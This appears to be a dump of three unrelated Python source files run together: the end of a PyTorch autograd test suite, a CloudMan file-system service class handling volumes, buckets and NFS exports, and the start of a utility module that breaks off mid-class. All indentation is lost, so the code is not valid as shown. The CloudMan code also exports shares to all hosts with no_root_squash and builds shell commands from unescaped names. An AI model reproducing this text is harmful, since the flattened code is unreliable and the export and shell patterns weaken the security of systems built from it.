def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument. So there isn't a mixed inference and normal
# tensor inputs for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since its equivalent as s.view(c.sizes()) which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
class PropagatingThread(threading.Thread):
'''Helper class to propagate exception from child
thread to main thread on join.
Reference: https://stackoverflow.com/a/31614591/5602957
'''
def run(self):
self.exception = None
try:
self.ret = super(PropagatingThread, self).run()
except Exception as e:
self.exception = e
def join(self, timeout=None):
super(PropagatingThread, self).join(timeout)
if self.exception:
raise self.exception from self.exception
return self.ret
threads = []
for _ in range(num_threads):
p = PropagatingThread(target=fn, args=args)
p.start()
threads.append(p)
for p in threads:
p.join()
def test_multithreaded_exception_propagation(self):
# Test whether exception in child thread
# are propagated to main thread.
def fn():
self.assertTrue(False)
with self.assertRaises(AssertionError):
self._run_py_multithread_fn(fn)
def test_simple_backward(self):
# simple multithreaded backward that create threads in the beginning of training
# and everything else is training separately, i.e. inputs, operations, etc.
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (i.e. This is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use functional grad() api, gradients will not
# be accumulate to the same place and should be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_multithread_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
def registers_hooks_for_each_thread():
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
x = torch.ones(5, 5, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
y = x * x
# should raise two warnings from x being saved twice
self.assertEqual(len(w), 2)
y.sum().backward()
def test_dataparallel_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
_self = self
class Model(torch.nn.Module):
def forward(self, x):
with warnings.catch_warnings(record=True) as w:
y = x * x
if torch.cuda.device_count() >= 2:
# DataParallel is calling the forward in different threads
# without progating TLS, so hooks should not be called here
_self.assertEqual(len(w), 0)
else:
# DataParallel only uses one thread
# so hooks should be called here
_self.assertGreater(len(w), 0)
x = torch.ones(5, 5, requires_grad=True)
model = torch.nn.DataParallel(Model())
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
model(x)
with warnings.catch_warnings(record=True) as w:
y = x * x
# hooks should be called here
_self.assertGreater(len(w), 0)
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
# different threads and we need to ensure user specify retain_graph=True, otherwise
# error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will be success in this case, all other threads should raise
# with the error that throw to user to recommend them specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# result should equal to num_thread * gradients
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# Import test cases from below autograd/ here. These are found
# implicitly by the loader, so Flake8 thinks they are unused, hence
# the suppressions.
from autograd.test_complex import TestAutogradComplex # noqa: F401
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
instantiate_parametrized_tests(TestAutograd)
if __name__ == '__main__':
run_tests()
|
filesystem.py | """
A core class for what CloudMan sees as a file system. This means that it is
aware of it and can thus manipulate it.
"""
import os
import shutil
import commands
import threading
from datetime import datetime
from boto.exception import EC2ResponseError
from cm.util import misc
from cm.util.misc import run
from cm.util.misc import flock
from cm.util.misc import nice_size
from cm.services import service_states
from cm.services import ServiceRole
from cm.services.data import DataService
from cm.services.data.mountablefs import MountableFS
from cm.services.data.volume import Volume
from cm.services.data.bucket import Bucket
from cm.services.data.transient_storage import TransientStorage
import logging
log = logging.getLogger('cloudman')
class Filesystem(DataService):
def __init__(self, app, name, svc_roles=[ServiceRole.GENERIC_FS], mount_point=None, persistent=True):
super(Filesystem, self).__init__(app)
log.debug("Instantiating Filesystem object {0} with service roles: {1}".format(
name, ServiceRole.to_string(svc_roles)))
self.svc_roles = svc_roles
self.nfs_lock_file = '/tmp/nfs.lockfile'
# TODO: Introduce a new file system layer that abstracts/consolidates
# potentially multiple devices under a single file system interface
# Maybe a class above this class should be introduced, e.g., DataService,
# that provides the common interface???
self.volumes = [] # A list of cm.services.data.volume.Volume objects
self.buckets = [] # A list of cm.services.data.bucket.Bucket objects
self.transient_storage = [] # Instance's transient storage
self.nfs_fs = None # NFS file system object implementing this file system's device
self.gluster_fs = None # GlusterFs based file system object implementing this file system's device
self.name = name # File system name
self.persistent = persistent # Whether it should be part of the cluster config
self.size = None # Total size of this file system
self.size_used = None # Used size of the this file system
self.size_pct = None # Used percentage of this file system
self.dirty = False
self.kind = None # Choice of 'snapshot', 'volume', 'bucket', 'transient', or 'nfs'
self.mount_point = mount_point if mount_point is not None else os.path.join(
self.app.path_resolver.mount_root, self.name)
self.grow = None # Used (APPLICABLE ONLY FOR the galaxyData FS) to indicate a need to grow
# the file system; use following dict structure:
# {'new_size': <size>, 'snap_desc': <snapshot description>}
self.started_starting = datetime.utcnow() # A time stamp when the state changed to
# STARTING; it is used to avoid brief ERROR
# states during the system configuration.
def __repr__(self):
return self.get_full_name()
def get_full_name(self):
"""
Return a descriptive name of this file system
"""
return "FS object for {0}".format(self.name)
def get_details(self):
"""
Return a dictionary with the details describing the details of this file system.
"""
details = {}
details = self._get_details(details)
# Uff... This is not scalable and, depending on the context, questionably
# functionally correct...
for vol in self.volumes:
details = vol._get_details(details)
for b in self.buckets:
details = b._get_details(details)
for ts in self.transient_storage:
details = ts._get_details(details)
if self.kind == 'nfs':
details = self.nfs_fs._get_details(details)
if self.kind == 'gluster':
details = self.gluster_fs._get_details(details)
return details
def _get_details(self, details):
"""
Get the general details about this file system, excluding any
device-specific details. Returns a dictionary.
"""
details['name'] = self.name
details['kind'] = str(self.kind).title()
details['size'] = nice_size(self.size)
details['size_used'] = nice_size(self.size_used)
details['size_pct'] = self.size_pct
details['status'] = self.state
details['err_msg'] = ""
details['mount_point'] = self.mount_point
details['persistent'] = "Yes" if self.persistent else "No"
return details
def add(self):
"""
Add this file system service by adding any devices that compose it
"""
if self.state == service_states.UNSTARTED or self.state == service_states.SHUT_DOWN:
try:
log.debug("Trying to add file system service named '{0}'"
.format(self.get_full_name()))
self.state = service_states.STARTING
self.started_starting = datetime.utcnow()
if not self.activated:
self.activated = True
log.debug("Service {0} self-activated".format(self.get_full_name()))
# TODO: devices must be added to a file system before one can
# be `added` and thus we know what `kind` a FS is. So, instead of
# iterating over all devices, just use `self.kind`-based if/else, right?
# See `nfs` case as an example
for vol in self.volumes:
# Threading has some issues w/ race conditions over device IDs
# threading.Thread(target=vol.add).start()
vol.add()
for b in self.buckets:
self.kind = 'bucket'
threading.Thread(target=b.mount).start()
log.debug("Initiated addition of FS from bucket {0}".format(
b.bucket_name))
for ts in self.transient_storage:
self.kind = 'transient'
ts.add()
if self.kind == 'nfs':
self.nfs_fs.start()
elif self.kind == 'gluster':
self.gluster_fs.start()
except Exception, e:
log.error("Error adding file system service {0}: {1}".format(
self.get_full_name(), e))
return False
self.status()
log.debug("Done adding devices to {0} (devices: {1}, {2}, {3}, {4}, {5})"
.format(self.get_full_name(), self.volumes, self.buckets,
self.transient_storage, self.nfs_fs.device if self.nfs_fs else '-', self.gluster_fs.device if self.gluster_fs else '-'))
return True
else:
log.debug("Data service {0} in {2} state instead of {1} state; cannot add it"
.format(self.get_full_name(), service_states.UNSTARTED, self.state))
return False
def remove(self, synchronous=False, delete_devices=False):
"""
Initiate removal of this file system from the system; do it in a
separate thread and return without waiting for the process to complete.
If ``delete_devices`` is set, ensure all devices composing this file
system are deleted in the process of service removal.
.. warning::
Setting ``delete_devices`` is irreversible. All data will be
permanently deleted.
"""
log.info("Initiating removal of '{0}' data service with: volumes {1}, buckets {2}, "
"transient storage {3}, nfs server {4} and gluster fs {5}".format(self.get_full_name(),
self.volumes, self.buckets, self.transient_storage, self.nfs_fs, self.gluster_fs))
self.state = service_states.SHUTTING_DOWN
r_thread = threading.Thread(target=self.__remove, kwargs={'delete_devices':
delete_devices})
r_thread.start()
if synchronous:
r_thread.join()
def __remove(self, delete_devices=False, remove_from_master=True, detach=True):
"""
Do the actual removal of devices used to compose this file system.
Setting ``delete_devices`` will instruct the underlying service to delete
any of its devices. **Warning**: all data on those devices will be
permanently deleted. *Note* that for the time being, ``delete_devices`` is
only propagated to the ``volume`` service/devices.
After the service is successfully stopped, if ``remove_from_master``
is set to ``True``, the service is automatically removed
from the list of services monitored by the master.
``detach`` applies to volume-based file systems only and, if set, the
given volume will be detached in the process of removing the file system.
Otherwise, it will be left attached (this is useful during snapshot creation).
"""
super(Filesystem, self).remove(synchronous=True)
log.debug("Removing {0} devices".format(self.get_full_name()))
self.state = service_states.SHUTTING_DOWN
for vol in self.volumes:
vol.remove(self.mount_point, delete_vols=delete_devices, detach=detach)
for b in self.buckets:
b.unmount()
for t in self.transient_storage:
t.remove()
if self.nfs_fs:
self.nfs_fs.stop()
elif self.gluster_fs:
self.gluster_fs.stop()
log.debug("Setting state of %s to '%s'" % (
self.get_full_name(), service_states.SHUT_DOWN))
self.state = service_states.SHUT_DOWN
# Remove self from the list of master's services
if self.state == service_states.SHUT_DOWN and remove_from_master:
self.app.manager.deactivate_master_service(self)
def clean(self):
"""
Remove this file system and clean up the system as if the file system was
never there. Useful for CloudMan restarts.
"""
self.__remove(delete_devices=True)
# If the service was successfuly removed, remove the mount point
if self.state == service_states.SHUT_DOWN:
try:
if len(os.listdir(self.mount_point)) > 0:
shutil.rmtree(self.mount_point)
except OSError, e:
log.error("Trouble cleaning directory '%s': %s" %
(self.mount_point, e))
else:
log.warning("Wanted to clean file system {0} but the service is not in state '{1}'; "
"it in state '{2}'").format(self.name, service_states.SHUT_DOWN, self.state)
def expand(self):
"""
Expand the size of this file system. Note that this process requires
the file system to be unmounted during the operation and the new one
will be automatically remounted upon completion of the process.
Also note that this method applies only to Volume-based file systems.
"""
if self.grow is not None:
self.__remove(delete_devices=False, remove_from_master=False)
self.state = service_states.CONFIGURING
smaller_vol_ids = []
# Create a snapshot of the detached volume
for vol in self.volumes:
smaller_vol_ids.append(vol.volume_id)
snap_id = vol.create_snapshot(self.grow['snap_description'])
# Reset the reference to the cloud volume resource object
vol.volume = None
# Set the size for the new volume
vol.size = self.grow['new_size']
# Set the snapshot from which a new volume resource object will
# be created
vol.from_snapshot_id = snap_id
# Create a new volume based on just created snapshot and add the
# file system
self.state = service_states.SHUT_DOWN # So it gets started again w/o monitor
# adding it as a new service;
# TOOD: define a set of stats for
# file system services
self.add()
# Grow the file system
if not run('/usr/sbin/xfs_growfs %s' % self.mount_point, "Error growing file system '%s'"
% self.mount_point, "Successfully grew file system '%s'" % self.mount_point):
return False
# Delete old, smaller volumes since everything seems to have gone ok
ec2_conn = self.app.cloud_interface.get_ec2_connection()
for smaller_vol_id in smaller_vol_ids:
try:
ec2_conn.delete_volume(smaller_vol_id)
log.debug("Deleted smaller volume {0} after resizing".format(
smaller_vol_id))
except EC2ResponseError, e:
log.error("Error deleting smaller volume '%s' after resizing: %s"
% (smaller_vol_id, e))
# If specified by user, delete the snapshot used during the
# resizing process
if self.grow['delete_snap'] is True:
try:
ec2_conn.delete_snapshot(snap_id)
log.debug("Deleted temporary snapshot {0} created and used during resizing"
.format(snap_id))
except EC2ResponseError, e:
log.error("Error deleting snapshot '%s' during '%s' resizing: %s"
% (snap_id, self.get_full_name(), e))
self.grow = None # Reset flag
return True
else:
log.debug("Tried to grow '%s' but grow flag is None" %
self.get_full_name())
return False
def create_snapshot(self, snap_description=None):
"""
Create a snapshot of this file system.
.. note::
This functionality applies only to file systems based on volumes.
"""
detach = True
if self.app.cloud_type == "ec2":
# On AWS it is possible to snapshot a volume while it's still
# attached so do that because it's faster
detach = False
self.__remove(delete_devices=False, detach=detach)
snap_ids = []
# Create a snapshot of the detached volumes
for vol in self.volumes:
snap_ids.append(vol.create_snapshot(snap_description=snap_description))
# After the snapshot is done, add the file system back as a cluster
# service
log.debug("{0} snapshot process completed; adding self to the list of master services"
.format(self.get_full_name()))
self.state = service_states.UNSTARTED # Need to reset state so it gets picked up by monitor
self.app.manager.activate_master_service(self)
return snap_ids
def _get_attach_device_from_device(self, device):
"""
Get the device a volume is attached as from the volume itself (i.e.,
double check that the ``device`` we have locally is the ``device`` the
cloud middleware sees as well).
If the devices do not match, return ``None``.
"""
for vol in self.volumes:
if device == vol.device:
# This is limited to file systems composed from 1 volume only
return vol.attach_device
return None
def check_and_update_volume(self, device):
"""
Run an update on the volume, making sure it exists, it is attached to this
instance to ``device``. If not, try to update the reference to self.
"""
# TODO: Abstract filtering into the cloud interface classes
# log.debug("Checking if a volume is attached to instance {0} on device {1}"
# .format(self.app.cloud_interface.get_instance_id(), device))
if self.app.cloud_type == "ec2":
# filtering w/ boto is supported only with ec2
f = {'attachment.device': device, 'attachment.instance-id':
self.app.cloud_interface.get_instance_id()}
vols = self.app.cloud_interface.get_ec2_connection().get_all_volumes(filters=f)
else:
vols = []
all_vols = self.app.cloud_interface.get_ec2_connection().get_all_volumes()
for vol in all_vols:
if vol.attach_data.instance_id == self.app.cloud_interface.get_instance_id() and \
vol.attach_data.device == device:
vols.append(vol)
# log.debug("Found these volume(s) during a check: '{0}'".format(vols))
if len(vols) == 1:
att_vol = vols[0]
for vol in self.volumes: # Currently, bc. only 1 vol can be assoc w/ FS, we'll only deal w/ 1 vol
if (vol is None and att_vol) or (vol and att_vol and vol.volume_id != att_vol.id):
log.debug("Discovered a change of vol %s to '%s', attached as device '%s', for FS '%s'"
% ([vol.volume_id for vol in self.volumes], att_vol.id, device, self.name))
vol.update(att_vol)
# If the new volume does not have tags (clusterName &
# filesystem), add those
if not self.app.cloud_interface.get_tag(att_vol, 'clusterName'):
self.app.cloud_interface.add_tag(
att_vol, 'clusterName', self.app.ud['cluster_name'])
if not self.app.cloud_interface.get_tag(att_vol, 'filesystem'):
self.app.cloud_interface.add_tag(att_vol, 'filesystem', self.name)
self.app.cloud_interface.add_tag(att_vol, 'Name', self.name)
# Update cluster configuration (i.e., persistent_data.yaml)
# in cluster's bucket
self.app.manager.console_monitor.store_cluster_config()
else:
log.warning("Did not find a volume attached to instance '%s' as device '%s', file system "
"'%s' (vols=%s)" % (self.app.cloud_interface.get_instance_id(),
device, self.name, vols))
def add_nfs_share(self, mount_point=None, permissions='rw'):
"""
Share the given/current file system/mount point over NFS. Note that
if the given mount point already exists in /etc/exports, replace
the existing line with the line composed within this method.
:type mount_point: string
:param mount_point: The mount point to add to the NFS share
:type permissions: string
:param permissions: Choose the type of permissions for the hosts
mounting this NFS mount point. Use: 'rw' for
read-write (default) or 'ro' for read-only
"""
log.debug("Will attempt to share mount point {0} over NFS.".format(mount_point))
try:
ee_file = '/etc/exports'
if mount_point is None:
mount_point = self.mount_point
# Compose the line that will be put into /etc/exports
# NOTE: with Spot instances, should we use 'async' vs. 'sync' option?
# See: http://linux.die.net/man/5/exports
ee_line = "{mp}\t*({perms},sync,no_root_squash,no_subtree_check)\n"\
.format(mp=mount_point, perms=permissions)
# Make sure we manipulate ee_file by a single process at a time
with flock(self.nfs_lock_file):
# Determine if the given mount point is already shared
with open(ee_file) as f:
shared_paths = f.readlines()
in_ee = -1
hadoo_mnt_point = "/opt/hadoop"
hadoop_set = False
for i, sp in enumerate(shared_paths):
if mount_point in sp:
in_ee = i
if hadoo_mnt_point in sp:
hadoop_set = True
# TODO:: change the follwoing line and make hadoop a file
# system
if not hadoop_set:
hdp_line = "{mp}\t*({perms},sync,no_root_squash,no_subtree_check)\n"\
.format(mp="/opt/hadoop", perms='rw')
shared_paths.append(hdp_line)
# If the mount point is already in /etc/exports, replace the existing
# entry with the newly composed ee_line (thus supporting change of
# permissions). Otherwise, append ee_line to the end of the
# file.
if in_ee > -1:
shared_paths[in_ee] = ee_line
else:
shared_paths.append(ee_line)
# Write out the newly composed file
with open(ee_file, 'w') as f:
f.writelines(shared_paths)
log.debug("Added '{0}' line to NFS file {1}".format(
ee_line.strip(), ee_file))
# Mark the NFS server as being in need of a restart
self.dirty = True
return True
except Exception, e:
log.error(
"Error configuring {0} file for NFS: {1}".format(ee_file, e))
return False
def remove_nfs_share(self, mount_point=None):
"""
Remove the given/current file system/mount point from being shared
over NFS. The method removes the file system's ``mount_point`` from
``/etc/share`` and indcates that the NFS server needs restarting.
"""
try:
ee_file = '/etc/exports'
if mount_point is None:
mount_point = self.mount_point
mount_point = mount_point.replace(
'/', '\/') # Escape slashes for sed
cmd = "sed -i '/^{0}\s/d' {1}".format(mount_point, ee_file)
log.debug("Removing NSF share for mount point {0}; cmd: {1}".format(
mount_point, cmd))
# To avoid race conditions between threads, use a lock file
with flock(self.nfs_lock_file):
run(cmd)
self.dirty = True
return True
except Exception, e:
log.error("Error removing FS {0} share from NFS: {1}".format(
mount_point, e))
return False
def _service_transitioning(self):
"""
A convenience method indicating if the service is in a transitioning state
(i.e., ``SHUTTING_DOWN, SHUT_DOWN, UNSTARTED, WAITING_FOR_USER_ACTION``).
If so, return ``True``, else return ``False``.
"""
if self.state == service_states.SHUTTING_DOWN or \
self.state == service_states.SHUT_DOWN or \
self.state == service_states.UNSTARTED or \
self.state == service_states.WAITING_FOR_USER_ACTION or \
self.state == service_states.CONFIGURING:
return True
return False
def _service_starting(self, wait_period=30):
"""
A convenience method that checks if a service has been in ``STARTING``
state too long. ``wait_period`` indicates how many seconds that period is.
So, if a service is in ``STARTING`` state and has been there for less then
the ``waiting_period``, the method returns ``True`` (i.e., the service IS
starting). If the service is in not in ``STARTING`` state or it's been in
that state for longer than the ``wait_period``, return ``False``.
Basically, this method allows a service to remain in ``STARTING`` state
for some time before actually checking its status - this helps avoid
brief ``ERROR`` states due to a service not yet been configured.
"""
if self.state == service_states.STARTING and \
(datetime.utcnow() - self.started_starting).seconds < wait_period:
log.debug(
"{0} in '{2}' state for {1} seconds".format(self.get_full_name(),
(datetime.utcnow() - self.started_starting).seconds, service_states.STARTING))
return True
return False
def _update_size(self, cmd=None):
"""
Update local size fields to reflect the current file system usage.
The optional ``cmd`` can be specified if the process of obtaining the
file system size differs from the *standard* one. If provided, the output
from this command must have the following format: *total used percentage*,
in bytes. For example: ``11524096 2314808 21%``
"""
if not cmd:
# Get the size and usage status for this file system in bytes
cmd = "df --block-size 1 | grep %s$ | awk '{print $2, $3, $5}'" % self.name
# Extract size & usage
try:
disk_usage = commands.getoutput(cmd)
if disk_usage:
disk_usage = disk_usage.split(' ')
if len(disk_usage) == 3:
self.size = disk_usage[0]
self.size_used = disk_usage[1]
self.size_pct = disk_usage[2]
else:
log.warning("Empty disk usage for FS {0}".format(self.name))
except Exception, e:
log.debug("Error updating file system {0} size and usage: {1}".format(
self.get_full_name(), e))
def _is_mounted(self, mount_point=None):
"""
Check if the `mount_point` (or `self.mount_point` if the argument is not
provided) is mounted. Do so by inspecting `/proc/mounts`.
"""
if not mount_point:
mount_point = self.mount_point
cmd = ("cat /proc/mounts | grep {0}[[:space:]] | cut -d' ' -f2"
.format(mount_point))
mnt_location = misc.getoutput(cmd)
if mnt_location:
try:
if mount_point == mnt_location:
return True
except Exception, e:
log.error("Exception checking if FS {0} is mounted at {1}: {2}"
.format(self.name, mount_point, e))
return False
def status(self):
"""
Do a status update for the current file system, checking
if the file system is mounted to a location based on its name.
Set state to RUNNING if the file system is accessible, otherwise
set state to ERROR.
"""
# log.debug("Updating service '%s-%s' status; current state: %s" \
# % (self.name, self.name, self.state))
if self.dirty:
# First check if the NFS server needs to be restarted but do it one
# thread at a time
with flock(self.nfs_lock_file):
if run(
"/etc/init.d/nfs-kernel-server restart", "Error restarting NFS server",
"As part of %s filesystem update, successfully restarted NFS server"
% self.name):
self.dirty = False
# Transient storage file system has its own process for checking status
if len(self.transient_storage) > 0:
for ts in self.transient_storage:
ts.status()
return
# Wait for s3fs to install before checking status
if len(self.buckets) > 0:
for b in self.buckets:
if not b.s3fs_installed:
return
# TODO: Move volume-specific checks into volume.py
if self._service_transitioning():
pass
elif self._service_starting():
pass
elif self.mount_point is not None:
mnt_location = commands.getstatusoutput("cat /proc/mounts | grep %s[[:space:]] "
"| cut -d' ' -f1,2" % self.mount_point)
if mnt_location[0] == 0 and mnt_location[1] != '':
try:
device, mnt_path = mnt_location[1].split(' ')
# Check volume(s) if part of the file system
if len(self.volumes) > 0:
self.check_and_update_volume(
self._get_attach_device_from_device(device))
# Check mount point
if mnt_path == self.mount_point:
self.state = service_states.RUNNING
self._update_size()
else:
log.error("STATUS CHECK [FS %s]: Retrieved mount path '%s' "
"does not match expected path '%s'" %
(self.get_full_name(), mnt_location[1], self.mount_point))
self.state = service_states.ERROR
except Exception, e:
log.error("STATUS CHECK: Exception checking status of FS "
"'{0}': {0}".format(self.name, e))
self.state = service_states.ERROR
log.debug(mnt_location)
else:
log.error("STATUS CHECK: File system {0} is not mounted at {1}"
.format(self.name, self.mount_point))
self.state = service_states.ERROR
else:
log.debug("Did not check status of filesystem '%s' with mount point '%s' in state '%s'"
% (self.name, self.mount_point, self.state))
def add_volume(self, vol_id=None, size=0, from_snapshot_id=None, dot=False, from_archive=None):
"""
Add a volume device to this file system.
Each file system is composed of actual devices; otherwise, it's just an
empty shell/wrapper for what CloudMan considers a file system.
"""
log.debug("Adding Volume (id={id}, size={size}, snap={snap}) into Filesystem {fs}"
.format(id=vol_id, size=size, snap=from_snapshot_id, fs=self.get_full_name()))
self.volumes.append(Volume(self, vol_id=vol_id, size=size,
from_snapshot_id=from_snapshot_id, static=dot, from_archive=from_archive))
def add_bucket(self, bucket_name, bucket_a_key=None, bucket_s_key=None):
"""
Add a bucket to this file system.
Each file system is composed of actual devices; otherwise, it's just an
empty shell/wrapper for what CloudMan considers a file system.
"""
log.debug("Adding Bucket (name={name}) into Filesystem {fs}"
.format(name=bucket_name, fs=self.get_full_name()))
self.buckets.append(
Bucket(self, bucket_name, bucket_a_key, bucket_s_key))
def add_transient_storage(self, from_archive=None, persistent=False):
"""
Add instance's transient storage and make it available over NFS to the
cluster. All this really does is makes a directory under ``/mnt`` and
exports it over NFS.
"""
log.debug("Configuring instance transient storage at {0} with NFS.".format(
self.mount_point))
self.kind = 'transient'
self.persistent = True if from_archive else persistent
self.transient_storage.append(TransientStorage(self, from_archive=from_archive))
def add_glusterfs(self, gluster_server, mount_options=None):
"""
Add a Gluster server (e.g., ``172.22.169.17:/gluster_dir``) to mount the file system from
"""
log.debug("Adding Gluster server {0} to file system {1}".format(gluster_server, self.name))
self.kind = 'gluster'
self.gluster_fs = MountableFS(self, 'glusterfs', gluster_server, mount_options=mount_options)
def add_nfs(self, nfs_server, username=None, pwd=None, mount_options=None):
"""
Add a NFS server (e.g., ``172.22.169.17:/nfs_dir``) to mount the file system from
"""
log.debug("Adding NFS server {0} to file system {1}".format(nfs_server, self.name))
self.kind = 'nfs'
self.nfs_fs = MountableFS(self, 'nfs', nfs_server, mount_options=mount_options)
|
utility.py | import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
